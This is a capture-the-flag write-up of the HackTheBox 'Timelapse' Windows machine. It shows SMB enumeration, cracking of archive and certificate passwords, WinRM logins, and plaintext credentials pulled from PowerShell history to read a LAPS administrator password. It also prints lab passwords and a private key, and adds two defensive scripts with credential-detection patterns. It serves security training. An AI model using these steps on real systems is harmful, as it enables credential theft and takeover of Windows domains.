Timelapse is one of the machines currently available on the HackTheBox hacking platform, rated Easy.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Timelapse machine, 10.10.11.152, to /etc/hosts as timelapse.htb and start with an nmap port scan.
```
nmap -sV -sC -oA enumeration/nmap1 -Pn 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.046s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-07-22T21:59:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 22 14:00:00 2022 -- 1 IP address (1 host up) scanned in 71.23 seconds
```
This first scan shows several interesting ports: the LDAP banner gives us the domain name timelapse.htb and the host name DC01, so we are looking at a domain controller, and SMB on 445 is the obvious first place to look. Let's see what we can get out of them.
Enumeration
We start by enumerating the SMB service and can list the shares without needing any credentials (a null session).
```
$ smbclient -L //10.10.11.152 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Shares          Disk
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
We have access, so let's see whether any of the shares gives us something more; the Shares share contains a couple of directories.
```
$ smbclient //10.10.11.152/Shares/
Enter WORKGROUP\asdf's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

		6367231 blocks of size 4096. 1293571 blocks available
```
So we go through each directory and download its contents to examine them more closely.
```
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021
get
		6367231 blocks of size 4096. 1294022 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (4,0 KiloBytes/sec) (average 4,0 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021
cd
		6367231 blocks of size 4096. 1292659 blocks available
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx    A    72683  Mon Oct 25 14:57:44 2021

		6367231 blocks of size 4096. 1291349 blocks available
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (1130,4 KiloBytes/sec) (average 680,7 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (208,5 KiloBytes/sec) (average 570,6 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (1038,7 KiloBytes/sec) (average 675,1 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (114,1 KiloBytes/sec) (average 570,1 KiloBytes/sec)
smb: \HelpDesk\>
```
We look at the zip file first; it contains a pfx file.
```
$ unzip -v winrm_backup.zip
Archive:  winrm_backup.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
    2555  Defl:N     2393   6% 2021-10-25 14:21 12ec5683  legacyy_dev_auth.pfx
--------          -------  ---                            -------
    2555             2393   6%                            1 file
```
If we try to extract the contents, we find the archive is password protected.
```
$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
   skipping: legacyy_dev_auth.pfx    incorrect password
```
So we use fcrackzip with the rockyou wordlist to recover the archive password.
```
$ fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt


PASSWORD FOUND!!!!: pw == supremelegacy
```
That was easier than it looked, so we extract the contents.
```
$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: legacyy_dev_auth.pfx
```
But now we have another problem: the pfx file is protected by a different password, which we need in order to extract the private key and the certificate. In this case we will use john to recover that password so we can extract its contents.
First we extract the hash from the file with pfx2john.
```
$ python3 /home/asdf/github/JohnTheRipper/run/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth.hash
```
Then we run john against that hash to recover the password.
```
$ john -w=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.hash --rule /usr/share/john/rules/rockyou-30000.rule
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:01:27 DONE (2022-07-22 14:23) 0.01138g/s 36785p/s 36785c/s 36785C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now that we have the password, we extract the contents with openssl.
First the private key:
```
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key -nodes
```
Its contents are:
```
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j
PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL
GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0
Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU
Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ
7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7
tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ
2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja
8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV
1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI
ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o
btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN
71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3
QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0
6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK
/ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r
c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X
TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8
A5ZZvI+GsHhm0Oab7PEWlRY=
-----END PRIVATE KEY-----
```
And then the certificate:
```
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
```
Its contents are:
```
Bag Attributes
    localKeyID: 01 00 00 00
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----
```
Now that we have the certificate and the private key, we use them to authenticate to the machine over WinRM with evil-winrm (certificate authentication over HTTPS, hence the -S flag). The file names in the command below differ from the ones used in the openssl commands above, but they are the same extracted key and certificate.
```
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -k decrypt-private.key -c certificate.pem -i 10.10.11.152

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents>
```
Getting the user flag
Now that we are in, we go to the user's desktop to get our flag.
```
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> cd desktop
*Evil-WinRM* PS C:\Users\legacyy\desktop> ls


    Directory: C:\Users\legacyy\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/22/2022   2:26 PM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\desktop> type user.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
*Evil-WinRM* PS C:\Users\legacyy\desktop>
```
Privilege escalation
The next step is to escalate privileges. Among other things, we start by checking the current user:
```
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /user

USER INFORMATION
----------------

User Name         SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
```
Its privileges:
```
*Evil-WinRM* PS C:\Users\legacyy\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\desktop>
```
And the user's account details and group memberships via net user:
```
*Evil-WinRM* PS C:\Users> net user legacyy
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/22/2022 3:29:40 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.
```
Nothing important stands out, so we run winPEAS to see whether it helps, and it finds a very interesting file: the user's PowerShell command history (the PSReadLine ConsoleHost_history.txt), whose contents are the following.
```
*Evil-WinRM* PS C:\users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```
Reviewing the file above, we find a set of credentials in plain text:
```
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
```
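A history file like the one above is the kind of artifact a defender can sweep for proactively rather than wait for someone else to find it. The following Python script is an added example and is not part of the original writeup or of any tool it uses: it scans PSReadLine history text for plaintext-credential patterns (a literal password passed to ConvertTo-SecureString -AsPlainText, an inline PSCredential, net user with a password on the command line) and for session options that disable certificate validation, and reports each hit with the secret redacted. The sample history is constructed to mirror the shape of the file on the box, with placeholder passwords in place of the real ones; the regexes and the function names scan_history and redact are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of a PSReadLine ConsoleHost_history.txt. It follows the
# shape of the history found on the box, but every password here is a
# made-up placeholder, not a real credential.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'NotTheRealPassword123!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user backup_svc P@ssw0rd-placeholder /add
get-aduser -filter * -properties *
exit
"""

# (label, regex). A "secret" group is redacted before reporting; a "user"
# group is reported as-is because an account name is context, not a secret.
PATTERNS = [
    ("plaintext password passed to ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>[^'\"]+)\1.*-AsPlainText", re.I)),
    ("PSCredential built inline for a named account",
     re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)),
    ("net user invoked with an inline password",
     re.compile(r"\bnet\s+user\s+\S+\s+(?P<secret>[^/\s]\S*)", re.I)),
    ("PSSessionOption that disables certificate validation",
     re.compile(r"New-PSSessionOption.*-Skip(CACheck|CNCheck|RevocationCheck)", re.I)),
]


def redact(value: str) -> str:
    """Keep two leading characters for correlation, mask the rest."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)


def scan_history(text: str) -> List[Dict[str, Optional[str]]]:
    """Return one finding per matching history line, secrets redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            groups = m.groupdict()
            if groups.get("secret"):
                evidence = redact(groups["secret"])
            else:
                evidence = groups.get("user")
            findings.append({"line": lineno, "finding": label, "evidence": evidence})
            break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['finding']} ({f['evidence']})")
```

In practice the scan would be run over every ConsoleHost_history.txt under C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine on a fleet; the -SkipCACheck finding is worth keeping alongside the credential hits because it shows remoting being used in a way that defeats the TLS check on port 5986.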
But rather than just logging in with the password, we take advantage of the commands already in the file and run them ourselves, so first we set up the variables:
```
*Evil-WinRM* PS C:\users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
```
And verify:
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
```
OK, it worked, so let's get information about this user's privileges and group memberships.
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv}

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/22/2022 3:44:57 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.
```
If we look closely, the user svc_deploy belongs to the LAPS_Readers group, which means it is allowed to read the local administrator password that LAPS stores on each computer object (the ms-Mcs-AdmPwd attribute). Knowing this, let's try to retrieve it.
```
*Evil-WinRM* PS C:\users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : S6QY1oDB00ZB8.)8+Cc#]4m1
ms-Mcs-AdmPwdExpirationTime : 133034307686369127
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DB01
ObjectClass                 : computer
ObjectGUID                  : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName              : DB01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DB01
ObjectClass                 : computer
ObjectGUID                  : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName              : DB01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : WEB01
ObjectClass                 : computer
ObjectGUID                  : 897c7cfe-ba15-4181-8f2c-a74f88952683
SamAccountName              : WEB01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1607
UserPrincipalName           :

PSComputerName              : localhost
RunspaceId                  : ac25db9e-ba9f-45c0-810b-efc1e7477e1b
DistinguishedName           : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DEV01
ObjectClass                 : computer
ObjectGUID                  : 02dc961a-7a60-4ec0-a151-0472768814ca
SamAccountName              : DEV01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1608
UserPrincipalName           :
```
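The Get-ADComputer output above is also exactly what a LAPS hygiene audit starts from: ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC), and computer objects with no ms-Mcs-AdmPwd at all (DB01, WEB01 and DEV01 here) show where LAPS is not in effect, which in a real environment usually means an unmanaged local administrator password or a stale object. The following Python script is an added example, not from the writeup or from the LAPS tooling: it parses Format-List style output, converts the expiry to a UTC timestamp, and flags computers with no managed password, an expired password that the client has not rotated, or an expiry further out than the 30-day default policy. The sample text is constructed from the records above with the password replaced by a placeholder; parse_format_list, filetime_to_utc, audit_laps and audit_text are my own names.

```python
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample in the Format-List layout Get-ADComputer prints. DC01
# mirrors the record above with the password replaced by a placeholder; the
# other two are computer objects that never received a LAPS password.
SAMPLE_OUTPUT = """
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : <placeholder-not-the-real-value>
ms-Mcs-AdmPwdExpirationTime : 133034307686369127
Name                        : DC01
SamAccountName              : DC01$

DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : DB01
SamAccountName              : DB01$

DistinguishedName           : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName                 :
Enabled                     : True
Name                        : WEB01
SamAccountName              : WEB01$
"""

# LAPS stores the expiry as a Windows FILETIME: 100-ns ticks since 1601-01-01 UTC.
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
DEFAULT_MAX_AGE = timedelta(days=30)  # legacy LAPS default PasswordAgeDays


def filetime_to_utc(filetime: int) -> datetime:
    """Convert a FILETIME integer to a timezone-aware UTC datetime."""
    return WINDOWS_EPOCH + timedelta(microseconds=filetime // 10)


def parse_format_list(text: str) -> List[Dict[str, str]]:
    """Split 'Key : Value' blocks separated by blank lines into dicts."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")  # values may contain ':' themselves
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def audit_laps(records: List[Dict[str, str]], now: datetime) -> List[Dict[str, str]]:
    """One finding per computer whose LAPS state needs attention."""
    findings = []
    for r in records:
        name = r.get("Name", "?")
        if not r.get("ms-Mcs-AdmPwd"):
            findings.append({"computer": name,
                             "issue": "no LAPS password present: LAPS not applied or stale object"})
            continue
        expires = filetime_to_utc(int(r.get("ms-Mcs-AdmPwdExpirationTime") or 0))
        if expires <= now:
            findings.append({"computer": name,
                             "issue": f"LAPS password expired at {expires.isoformat()} and has not been rotated"})
        elif expires - now > DEFAULT_MAX_AGE:
            findings.append({"computer": name,
                             "issue": f"expiry {expires.isoformat()} is beyond the 30-day policy window"})
    return findings


def audit_text(text: str, now_iso: str) -> List[Dict[str, str]]:
    """Convenience wrapper: raw Get-ADComputer text plus an ISO-8601 'now'."""
    return audit_laps(parse_format_list(text), datetime.fromisoformat(now_iso))


if __name__ == "__main__":
    # The box's clock read 2022-07-22T21:59:23 in the nmap output above.
    for f in audit_text(SAMPLE_OUTPUT, "2022-07-22T22:00:00+00:00"):
        print(f"{f['computer']}: {f['issue']}")
```

Run against the records above with the box's own clock as "now", only the three password-less computers are flagged; DC01's expiry decodes to 2022-07-27T21:26:08 UTC, five days after the scan, so the password was still within its window at the time. The same parser works on the output of the real command piped to a file, and the audit is the one a LAPS_Readers member should be running, since that group's membership is precisely what makes the attribute readable.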
Running that command gives us the local administrator password for DC01 (the only computer object with a LAPS password set), so let's try logging in with evil-winrm.
```
$ ruby /home/asdf/github/evil-winrm/evil-winrm.rb -S -u Administrator -p "S6QY1oDB00ZB8.)8+Cc#]4m1" -i 10.10.11.152

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
```
Getting the root flag
We are admin now, so let's get our flag. To our surprise it is not in the usual place: checking each user's home directory, we find it on the desktop of the user TRX rather than on Administrator's.
```
*Evil-WinRM* PS C:\Users\TRX> ls desktop


    Directory: C:\Users\TRX\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/22/2022   2:26 PM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX> type desktop/root.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxb
*Evil-WinRM* PS C:\Users\TRX>
```
And with that we have our root flag, completing the machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link.